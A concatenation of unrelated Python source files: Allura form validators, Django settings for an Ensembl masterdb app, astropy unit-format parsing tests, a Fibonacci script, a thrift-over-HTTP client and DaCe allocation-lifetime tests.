value, state)
if c.project and c.project.app_instance(mount_point) is not None:
raise fe.Invalid(
'Mount point "%s" is already in use' % mount_point,
value, state)
return mount_point
def empty_value(self, value):
base_mount_point = mount_point = self.app_class.default_mount_point
i = 0
while True:
if not c.project or c.project.app_instance(mount_point) is None:
return mount_point
mount_point = base_mount_point + '-%d' % i
i += 1
class TaskValidator(fev.FancyValidator):
def _to_python(self, value, state):
try:
mod, func = value.rsplit('.', 1)
except ValueError:
raise fe.Invalid('Invalid task name. Please provide the full '
'dotted path to the python callable.', value, state)
try:
mod = __import__(mod, fromlist=[str(func)])
except ImportError:
raise fe.Invalid('Could not import "%s"' % value, value, state)
try:
task = getattr(mod, func)
except AttributeError:
raise fe.Invalid('Module has no attribute "%s"' %
func, value, state)
if not hasattr(task, 'post'):
raise fe.Invalid('"%s" is not a task.' % value, value, state)
return task
class UserValidator(fev.FancyValidator):
def _to_python(self, value, state):
from allura import model as M
user = M.User.by_username(value)
if not user:
raise fe.Invalid('Invalid username', value, state)
return user
class AnonymousValidator(fev.FancyValidator):
def _to_python(self, value, state):
from allura.model import User
if value:
if c.user == User.anonymous():
raise fe.Invalid('Log in to Mark as Private', value, state)
else:
return value
class PathValidator(fev.FancyValidator):
def _to_python(self, value, state):
from allura import model as M
parts = value.strip('/').split('/')
if len(parts) < 2:
raise fe.Invalid("You must specify at least a neighborhood and "
"project, i.e. '/nbhd/project'", value, state)
elif len(parts) == 2:
nbhd_name, project_name, app_name = parts[0], parts[1], None
elif len(parts) > 2:
nbhd_name, project_name, app_name = parts[0], parts[1], parts[2]
path_parts = {}
nbhd_url_prefix = '/%s/' % nbhd_name
nbhd = M.Neighborhood.query.get(url_prefix=nbhd_url_prefix)
if not nbhd:
raise fe.Invalid('Invalid neighborhood: %s' %
nbhd_url_prefix, value, state)
project = M.Project.query.get(
shortname=nbhd.shortname_prefix + project_name,
neighborhood_id=nbhd._id)
if not project:
raise fe.Invalid('Invalid project: %s' %
project_name, value, state)
path_parts['project'] = project
if app_name:
app = project.app_instance(app_name)
if not app:
raise fe.Invalid('Invalid app mount point: %s' %
app_name, value, state)
path_parts['app'] = app
return path_parts
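# Illustrative input/output (hypothetical names): "/p/myproject/wiki" resolves
# to {'project': <Project>, 'app': <wiki app instance>}, while "/p/myproject"
# yields only the 'project' key.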
class JsonValidator(fev.FancyValidator):
"""Validates a string as JSON and returns the original string"""
def _to_python(self, value, state):
try:
json.loads(value)
except ValueError, e:
raise fe.Invalid('Invalid JSON: ' + str(e), value, state)
return value
class JsonConverter(fev.FancyValidator):
"""Deserializes a string to JSON and returns a Python object"""
def _to_python(self, value, state):
try:
obj = json.loads(value)
except ValueError, e:
raise fe.Invalid('Invalid JSON: ' + str(e), value, state)
return obj
class JsonFile(fev.FieldStorageUploadConverter):
"""Validates that a file is JSON and returns the deserialized Python object
"""
def _to_python(self, value, state):
return JsonConverter.to_python(value.value)
class UserMapJsonFile(JsonFile):
"""Validates that a JSON file conforms to this format:
{str:str, ...}
and returns a deserialized or stringified copy of it.
"""
def __init__(self, as_string=False):
self.as_string = as_string
def _to_python(self, value, state):
value = super(self.__class__, self)._to_python(value, state)
try:
for k, v in value.iteritems():
if not(isinstance(k, basestring) and isinstance(v, basestring)):
raise
return json.dumps(value) if self.as_string else value
except:
raise fe.Invalid(
'User map file must contain mapping of {str:str, ...}',
value, state)
class CreateTaskSchema(fe.Schema):
task = TaskValidator(not_empty=True, strip=True)
task_args = JsonConverter(if_missing=dict(args=[], kwargs={}))
user = UserValidator(strip=True, if_missing=None)
path = PathValidator(strip=True, if_missing={}, if_empty={})
class CreateSiteNotificationSchema(fe.Schema):
active = fev.StringBool(if_missing=False)
impressions = fev.Int(not_empty=True)
content = fev.UnicodeString(not_empty=True)
user_role = fev.FancyValidator(not_empty=False, if_empty=None)
page_regex = fev.FancyValidator(not_empty=False, if_empty=None)
page_tool_type = fev.FancyValidator(not_empty=False, if_empty=None)
class DateValidator(fev.FancyValidator):
def _to_python(self, value, state):
value = convertDate(value)
if not value:
raise fe.Invalid(
"Please enter a valid date in the format DD/MM/YYYY.",
value, state)
return value
class TimeValidator(fev.FancyValidator):
def _to_python(self, value, state):
value = convertTime(value)
if not value:
raise fe.Invalid(
"Please enter a valid time in the format HH:MM.",
value, state)
return value
class OneOfValidator(fev.FancyValidator):
def __init__(self, validvalues, not_empty=True):
self.validvalues = validvalues
self.not_empty = not_empty
super(OneOfValidator, self).__init__()
def _to_python(self, value, state):
if not value.strip():
if self.not_empty:
raise fe.Invalid("This field can't be empty.", value, state)
else:
return None
if value not in self.validvalues:
allowed = ''
for v in self.validvalues:
if allowed != '':
allowed = allowed + ', '
allowed = allowed + '"%s"' % v
raise fe.Invalid(
"Invalid value. The allowed values are %s." % allowed,
value, state)
return value
class MapValidator(fev.FancyValidator):
def __init__(self, mapvalues, not_empty=True):
self.map = mapvalues
self.not_empty = not_empty
super(MapValidator, self).__init__()
def _to_python(self, value, state):
if not value.strip():
if self.not_empty:
raise fe.Invalid("This field can't be empty.", value, state)
else:
return None
conv_value = self.map.get(value)
if not conv_value:
raise fe.Invalid(
"Invalid value. Please, choose one of the valid values.",
value, state)
return conv_value
class YouTubeConverter(fev.FancyValidator):
"""Takes a given YouTube URL. Ensures that the video_id
is contained in the URL. Returns a clean URL to use for iframe embedding.
REGEX: http://stackoverflow.com/a/10315969/25690
"""
REGEX = ('^(?:https?:\/\/)?(?:www\.)?'+
'(?:youtu\.be\/|youtube\.com\/(?:embed\/|v\/|watch\?v=|watch\?.+&v=))'+
'((\w|-){11})(?:\S+)?$')
def _to_python(self, value, state):
match = re.match(YouTubeConverter.REGEX, value)
if match:
video_id = match.group(1)
return 'www.youtube.com/embed/{}?rel=0'.format(video_id)
else:
raise fe.Invalid(
"The URL does not appear to be a valid YouTube video.",
value, state)
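# Example conversion implied by the regex and format string above:
#   "https://youtu.be/dQw4w9WgXcQ" -> "www.youtube.com/embed/dQw4w9WgXcQ?rel=0"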
def convertDate(datestring):
formats = ['%Y-%m-%d', '%Y.%m.%d', '%Y/%m/%d', '%Y\%m\%d', '%Y %m %d',
'%d-%m-%Y', '%d.%m.%Y', '%d/%m/%Y', '%d\%m\%Y', '%d %m %Y']
for f in formats:
try:
date = datetime.strptime(datestring, f)
return date
except:
pass
return None
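# Example (per the format list above): convertDate('25/12/2020') and
# convertDate('2020-12-25') both return datetime(2020, 12, 25, 0, 0);
# unparseable strings return None.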
def convertTime(timestring):
formats = ['%H:%M', '%H.%M', '%H %M', '%H,%M']
for f in formats:
try:
time = datetime.strptime(timestring, f)
return {'h': time.hour, 'm': time.minute}
except:
pass
return None
class IconValidator(fev.FancyValidator):
regex = '(jpg|jpeg|gif|png|bmp)$'
def _to_python(self, value, state):
p = re.compile(self.regex, flags=re.I)
result = p.search(value.filename)
if not result:
raise fe.Invalid(
'Project icons must be PNG, GIF, JPG, or BMP format.',
value, state)
return value
|
py | 1a38907fab023a06e7941995ac5cb49737f400e8 | # See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
DEBUG = True
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = '!$hfny5#0soe435!a)fhmv!egr)*8p*lkpv$^&e#=yxt&yd-wc'
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ensembl.production.masterdb',
'rest_framework',
'rest_framework_swagger',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ensembl_prodinf_masterdb.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ensembl_prodinf_masterdb.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': Path.joinpath(BASE_DIR.parent, 'db.sqlite3'),
}
}
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
|
py | 1a3892914637be23e4b0aeaf099deee0d6b9ef47 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Regression tests for the units.format package
"""
import pytest
from numpy.testing import assert_allclose
from astropy.tests.helper import catch_warnings
from astropy import units as u
from astropy.constants import si
from astropy.units import core
from astropy.units import format as u_format
from astropy.units.utils import is_effectively_unity
@pytest.mark.parametrize('strings, unit', [
(["m s", "m*s", "m.s"], u.m * u.s),
(["m/s", "m*s**-1", "m /s", "m / s", "m/ s"], u.m / u.s),
(["m**2", "m2", "m**(2)", "m**+2", "m+2", "m^(+2)"], u.m ** 2),
(["m**-3", "m-3", "m^(-3)", "/m3"], u.m ** -3),
(["m**(1.5)", "m(3/2)", "m**(3/2)", "m^(3/2)"], u.m ** 1.5),
(["2.54 cm"], u.Unit(u.cm * 2.54)),
(["10+8m"], u.Unit(u.m * 1e8)),
# This is the VOUnits documentation, but doesn't seem to follow the
# unity grammar (["3.45 10**(-4)Jy"], 3.45 * 1e-4 * u.Jy)
(["sqrt(m)"], u.m ** 0.5),
(["dB(mW)", "dB (mW)"], u.DecibelUnit(u.mW)),
(["mag"], u.mag),
(["mag(ct/s)"], u.MagUnit(u.ct / u.s)),
(["dex"], u.dex),
(["dex(cm s**-2)", "dex(cm/s2)"], u.DexUnit(u.cm / u.s**2))])
def test_unit_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.Generic.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', ['sin( /pixel /s)', 'mag(mag)',
'dB(dB(mW))', 'dex()'])
def test_unit_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.Generic.parse(string)
@pytest.mark.parametrize('strings, unit', [
(["0.1nm"], u.AA),
(["mW/m2"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["mW/(m2)"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["km/s", "km.s-1"], u.km / u.s),
(["10pix/nm"], u.Unit(10 * u.pix / u.nm)),
(["1.5x10+11m"], u.Unit(1.5e11 * u.m)),
(["1.5ร10+11m"], u.Unit(1.5e11 * u.m)),
(["m2"], u.m ** 2),
(["10+21m"], u.Unit(u.m * 1e21)),
(["2.54cm"], u.Unit(u.cm * 2.54)),
(["20%"], 0.20 * u.dimensionless_unscaled),
(["10+9"], 1.e9 * u.dimensionless_unscaled),
(["2x10-9"], 2.e-9 * u.dimensionless_unscaled),
(["---"], u.dimensionless_unscaled),
(["ma"], u.ma),
(["mAU"], u.mAU),
(["uarcmin"], u.uarcmin),
(["uarcsec"], u.uarcsec),
(["kbarn"], u.kbarn),
(["Gbit"], u.Gbit),
(["Gibit"], 2 ** 30 * u.bit),
(["kbyte"], u.kbyte),
(["mRy"], 0.001 * u.Ry),
(["mmag"], u.mmag),
(["Mpc"], u.Mpc),
(["Gyr"], u.Gyr),
(["ยฐ"], u.degree),
(["ยฐ/s"], u.degree / u.s),
(["ร
"], u.AA),
(["ร
/s"], u.AA / u.s),
(["\\h"], si.h)])
def test_cds_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.CDS.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'0.1 nm',
'solMass(3/2)',
'km / s',
'km s-1',
'pix0.1nm',
'pix/(0.1nm)',
'km*s',
'km**2',
'5x8+3m',
'0.1---',
'---m',
'm---',
'mag(s-1)',
'dB(mW)',
'dex(cm s-2)'])
def test_cds_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.CDS.parse(string)
# These examples are taken from the EXAMPLES section of
# https://heasarc.gsfc.nasa.gov/docs/heasarc/ofwg/docs/general/ogip_93_001/
@pytest.mark.parametrize('strings, unit', [
(["count /s", "count/s", "count s**(-1)", "count / s", "count /s "],
u.count / u.s),
(["/pixel /s", "/(pixel * s)"], (u.pixel * u.s) ** -1),
(["count /m**2 /s /eV", "count m**(-2) * s**(-1) * eV**(-1)",
"count /(m**2 * s * eV)"],
u.count * u.m ** -2 * u.s ** -1 * u.eV ** -1),
(["erg /pixel /s /GHz", "erg /s /GHz /pixel", "erg /pixel /(s * GHz)"],
u.erg / (u.s * u.GHz * u.pixel)),
(["keV**2 /yr /angstrom", "10**(10) keV**2 /yr /m"],
# Though this is given as an example, it seems to violate the rules
# of not raising scales to powers, so I'm just excluding it
# "(10**2 MeV)**2 /yr /m"
u.keV**2 / (u.yr * u.angstrom)),
(["10**(46) erg /s", "10**46 erg /s", "10**(39) J /s", "10**(39) W",
"10**(15) YW", "YJ /fs"],
10**46 * u.erg / u.s),
(["10**(-7) J /cm**2 /MeV", "10**(-9) J m**(-2) eV**(-1)",
"nJ m**(-2) eV**(-1)", "nJ /m**2 /eV"],
10 ** -7 * u.J * u.cm ** -2 * u.MeV ** -1),
(["sqrt(erg /pixel /s /GHz)", "(erg /pixel /s /GHz)**(0.5)",
"(erg /pixel /s /GHz)**(1/2)",
"erg**(0.5) pixel**(-0.5) s**(-0.5) GHz**(-0.5)"],
(u.erg * u.pixel ** -1 * u.s ** -1 * u.GHz ** -1) ** 0.5),
(["(count /s) (/pixel /s)", "(count /s) * (/pixel /s)",
"count /pixel /s**2"],
(u.count / u.s) * (1.0 / (u.pixel * u.s)))])
def test_ogip_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.OGIP.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'log(photon /m**2 /s /Hz)',
'sin( /pixel /s)',
'log(photon /cm**2 /s /Hz) /(sin( /pixel /s))',
'log(photon /cm**2 /s /Hz) (sin( /pixel /s))**(-1)',
'dB(mW)', 'dex(cm/s**2)'])
def test_ogip_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.OGIP.parse(string)
@pytest.mark.parametrize('unit', [val for key, val in u.__dict__.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip(unit):
a = core.Unit(unit.to_string('generic'), format='generic')
b = core.Unit(unit.decompose().to_string('generic'), format='generic')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.VOUnit._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_vo_unit(unit):
a = core.Unit(unit.to_string('vounit'), format='vounit')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
if unit not in (u.mag, u.dB):
ud = unit.decompose().to_string('vounit')
assert ' ' not in ud
b = core.Unit(ud, format='vounit')
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.Fits._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_fits(unit):
s = unit.to_string('fits')
a = core.Unit(s, format='fits')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.CDS._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_cds(unit):
a = core.Unit(unit.to_string('cds'), format='cds')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('cds'), format='cds')
except ValueError: # skip mag: decomposes into dex, unknown to CDS
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.OGIP._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_ogip(unit):
a = core.Unit(unit.to_string('ogip'), format='ogip')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('ogip'), format='ogip')
except ValueError: # skip mag: decomposes into dex, unknown to OGIP
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
def test_fits_units_available():
u_format.Fits._units
def test_vo_units_available():
u_format.VOUnit._units
def test_cds_units_available():
u_format.CDS._units
def test_cds_non_ascii_unit():
"""Regression test for #5350. This failed with a decoding error as
μas could not be represented in ascii."""
from astropy.units import cds
with cds.enable():
u.radian.find_equivalent_units(include_prefix_units=True)
def test_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert fluxunit.to_string('latex') == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_new_style_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert "{0:latex}".format(fluxunit) == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_latex_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex = r'$\mathrm{1 \times 10^{-24}\,\frac{erg}{Hz\,s\,cm^{2}}}$'
assert fluxunit.to_string('latex') == latex
def test_latex_inline_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex_inline = (r'$\mathrm{1 \times 10^{-24}\,erg'
r'\,Hz^{-1}\,s^{-1}\,cm^{-2}}$')
assert fluxunit.to_string('latex_inline') == latex_inline
@pytest.mark.parametrize('format_spec, string', [
('generic', 'erg / (cm2 s)'),
('s', 'erg / (cm2 s)'),
('console', ' erg \n ------\n s cm^2'),
('latex', '$\\mathrm{\\frac{erg}{s\\,cm^{2}}}$'),
('latex_inline', '$\\mathrm{erg\\,s^{-1}\\,cm^{-2}}$'),
('>20s', ' erg / (cm2 s)')])
def test_format_styles(format_spec, string):
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert format(fluxunit, format_spec) == string
def test_flatten_to_known():
myunit = u.def_unit("FOOBAR_One", u.erg / u.Hz)
assert myunit.to_string('fits') == 'erg Hz-1'
myunit2 = myunit * u.bit ** 3
assert myunit2.to_string('fits') == 'bit3 erg Hz-1'
def test_flatten_impossible():
myunit = u.def_unit("FOOBAR_Two")
with u.add_enabled_units(myunit), pytest.raises(ValueError):
myunit.to_string('fits')
def test_console_out():
"""
Issue #436.
"""
u.Jy.decompose().to_string('console')
def test_flexible_float():
assert u.min._represents.to_string('latex') == r'$\mathrm{60\,s}$'
def test_fraction_repr():
area = u.cm ** 2.0
assert '.' not in area.to_string('latex')
fractional = u.cm ** 2.5
assert '5/2' in fractional.to_string('latex')
assert fractional.to_string('unicode') == 'cm⁵ᐟ²'
def test_scale_effectively_unity():
"""Scale just off unity at machine precision level is OK.
Ensures #748 does not recur
"""
a = (3. * u.N).cgs
assert is_effectively_unity(a.unit.scale)
assert len(a.__repr__().split()) == 3
def test_percent():
"""Test that the % unit is properly recognized. Since % is a special
symbol, this goes slightly beyond the round-tripping tested above."""
assert u.Unit('%') == u.percent == u.Unit(0.01)
assert u.Unit('%', format='cds') == u.Unit(0.01)
assert u.Unit(0.01).to_string('cds') == '%'
with pytest.raises(ValueError):
u.Unit('%', format='fits')
with pytest.raises(ValueError):
u.Unit('%', format='vounit')
def test_scaled_dimensionless():
"""Test that scaled dimensionless units are properly recognized in generic
and CDS, but not in fits and vounit."""
assert u.Unit('0.1') == u.Unit(0.1) == 0.1 * u.dimensionless_unscaled
assert u.Unit('1.e-4') == u.Unit(1.e-4)
assert u.Unit('10-4', format='cds') == u.Unit(1.e-4)
assert u.Unit('10+8').to_string('cds') == '10+8'
with pytest.raises(ValueError):
u.Unit(0.15).to_string('fits')
assert u.Unit(0.1).to_string('fits') == '10**-1'
with pytest.raises(ValueError):
u.Unit(0.1).to_string('vounit')
def test_deprecated_did_you_mean_units():
try:
u.Unit('ANGSTROM', format='fits')
except ValueError as e:
assert 'Did you mean Angstrom or angstrom?' in str(e)
try:
u.Unit('crab', format='ogip')
except ValueError as e:
assert 'Crab (deprecated)' in str(e)
assert 'mCrab (deprecated)' in str(e)
try:
u.Unit('ANGSTROM', format='vounit')
except ValueError as e:
assert 'angstrom (deprecated)' in str(e)
assert '0.1nm' in str(e)
assert str(e).count('0.1nm') == 1
with catch_warnings() as w:
u.Unit('angstrom', format='vounit')
assert len(w) == 1
assert '0.1nm' in str(w[0].message)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_fits_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.Fits().parse(string)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_vounit_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.VOUnit().parse(string)
def test_vounit_binary_prefix():
assert u.Unit('KiB', format='vounit') == u.Unit('1024 B')
assert u.Unit('Kibyte', format='vounit') == u.Unit('1024 B')
assert u.Unit('Kibit', format='vounit') == u.Unit('1024 b')
with catch_warnings() as w:
u.Unit('kibibyte', format='vounit')
assert len(w) == 1
def test_vounit_unknown():
assert u.Unit('unknown', format='vounit') is None
assert u.Unit('UNKNOWN', format='vounit') is None
assert u.Unit('', format='vounit') is u.dimensionless_unscaled
def test_vounit_details():
assert u.Unit('Pa', format='vounit') is u.Pascal
# The da- prefix is not allowed, and the d- prefix is discouraged
assert u.dam.to_string('vounit') == '10m'
assert u.Unit('dam dag').to_string('vounit') == '100g m'
def test_vounit_custom():
x = u.Unit("'foo' m", format='vounit')
x_vounit = x.to_string('vounit')
assert x_vounit == "'foo' m"
x_string = x.to_string()
assert x_string == "foo m"
x = u.Unit("m'foo' m", format='vounit')
assert x.bases[1]._represents.scale == 0.001
x_vounit = x.to_string('vounit')
assert x_vounit == "m m'foo'"
x_string = x.to_string()
assert x_string == 'm mfoo'
def test_vounit_implicit_custom():
x = u.Unit("furlong/week", format="vounit")
assert x.bases[0]._represents.scale == 1e-15
assert x.bases[0]._represents.bases[0].name == 'urlong'
def test_fits_scale_factor():
with pytest.raises(ValueError):
x = u.Unit('1000 erg/s/cm**2/Angstrom', format='fits')
with pytest.raises(ValueError):
x = u.Unit('12 erg/s/cm**2/Angstrom', format='fits')
x = u.Unit('10+2 erg/s/cm**2/Angstrom', format='fits')
assert x == 100 * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**2 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20)*erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
x = u.Unit(1.2 * u.erg)
with pytest.raises(ValueError):
x.to_string(format='fits')
x = u.Unit(100.0 * u.erg)
assert x.to_string(format='fits') == '10**2 erg'
|
py | 1a38956b8d371c7fbccf06cc2d86392ad48311e8 | def fibonacciSequence(N):
result = []
previous = 1
previousPrevious = 1
result.append(1)
result.append(1)
for i in range(N - 2):
current = previous + previousPrevious
result.append(current)
previousPrevious = previous
previous = current
return result
print(fibonacciSequence(100))
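# Sanity check: fibonacciSequence(7) -> [1, 1, 2, 3, 5, 8, 13], i.e. exactly N values.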
|
py | 1a38968825a4396c1a505912a2aa02140bcb7bde | """
API for GNU Gama functionality.
"""
from .writer import GamaWriter
from .reader import GamaReader
|
py | 1a38978961e42a535a383c0da3e34066bbe3f377 | """
Copyright (c) 2019 4masaka
This software is released under the MIT License.
https://opensource.org/licenses/MIT
"""
from typing import Dict, Optional
import aiohttp
from frugal.aio.transport import FTransportBase
from frugal.context import FContext
from thrift.transport.TTransport import TMemoryBuffer, TTransportBase
class HttpClient(FTransportBase):
def __init__(
self, uri: str, headers: Optional[Dict] = None, request_capacity: int = 0
) -> None:
super().__init__(request_capacity)
self.uri = uri
self.headers = {
"Content-Type": "application/x-thrift",
"Accept": "application/x-thrift",
}
if headers:
    self.headers.update(headers)
def is_open(self) -> bool:
return True
def open(self) -> bool:
return True
async def close(self) -> None:
raise NotImplementedError()
async def oneway(self, context, payload):
raise NotImplementedError()
async def set_monitor(self, monitor):
raise NotImplementedError()
async def request(self, context: FContext, payload) -> TTransportBase:
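# Assumption: the leading 4 bytes are the frugal frame-size header, which a
# plain HTTP transport does not need, hence the slice below.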
payload = payload[4:]
async with aiohttp.request(
"POST",
url=self.uri,
data=payload,
headers=self.headers
) as res:
return TMemoryBuffer(await res.content.read())
class HttpClientFactory:
def __init__(self, host: str, port: int = 443, scheme: str = "https"):
self.host = host
self.port = port
self.scheme = scheme
def get_client(self, path: str, headers: Optional[Dict] = None) -> HttpClient:
uri = f"{self.scheme}://{self.host}:{self.port}{path}"
return HttpClient(uri, headers=headers)
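# Usage sketch (hypothetical host and path, not part of this module):
#   factory = HttpClientFactory("example.com")
#   client = factory.get_client("/api", headers={"X-Token": "..."})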
|
py | 1a38983193d08097937e4cf51a38b10917649e06 | # Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Tests different allocation lifetimes. """
import pytest
import dace
from dace.codegen.targets import framecode
from dace.sdfg import infer_types
import numpy as np
N = dace.symbol('N')
def _test_determine_alloc(lifetime: dace.AllocationLifetime, unused: bool = False) -> dace.SDFG:
""" Creates an SDFG playground for determining allocation. """
sdfg = dace.SDFG('lifetimetest')
sdfg.add_array('A', [N], dace.float64)
sdfg.add_array('B', [N], dace.float64)
sdfg.add_transient('unused', [N], dace.float64, lifetime=lifetime)
state = sdfg.add_state()
me, mx = state.add_map('m', dict(i='0:N'))
#########################################################################
nsdfg = dace.SDFG('nested')
nsdfg.add_array('A', [N], dace.float64)
nsdfg.add_array('B', [N], dace.float64)
nsdfg.add_transient('tmp', [N], dace.float64, dace.StorageType.GPU_Global, lifetime=lifetime)
nsdfg.add_transient('tmp2', [1], dace.float64, dace.StorageType.Register, lifetime=lifetime)
nstate = nsdfg.add_state()
ime, imx = nstate.add_map('m2', dict(i='0:20'), schedule=dace.ScheduleType.GPU_Device)
t1 = nstate.add_access('tmp')
t2 = nstate.add_access('tmp2')
nstate.add_nedge(t1, t2, dace.Memlet('tmp[0]'))
nstate.add_memlet_path(nstate.add_read('A'), ime, t1, memlet=dace.Memlet('A[i]'))
nstate.add_memlet_path(t2, imx, nstate.add_write('B'), memlet=dace.Memlet('B[0]', wcr='lambda a,b: a+b'))
#########################################################################
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {'A'}, {'B'})
state.add_memlet_path(state.add_read('A'), me, nsdfg_node, dst_conn='A', memlet=dace.Memlet('A[0:N]'))
state.add_memlet_path(nsdfg_node, mx, state.add_write('B'), src_conn='B', memlet=dace.Memlet('B[0:N]'))
# Set default storage/schedule types in SDFG
infer_types.set_default_schedule_and_storage_types(sdfg, None)
return sdfg, (sdfg, state, me, nsdfg, nstate, ime)
def _check_alloc(id, name, codegen, scope):
# for sdfg_id, _, node in codegen.to_allocate[scope]:
# if id == sdfg_id and name == node.data:
# return True
for sdfg, _, node, _, _, _ in codegen.to_allocate[scope]:
if sdfg.sdfg_id == id and name == node.data:
return True
return False
def test_determine_alloc_scope():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Scope)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# tmp cannot be allocated within the inner scope because it is GPU_Global
assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-1])
def test_determine_alloc_state():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.State, unused=True)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# Ensure that unused transients are not allocated
assert not any('__0_unused' in field for field in codegen.statestruct)
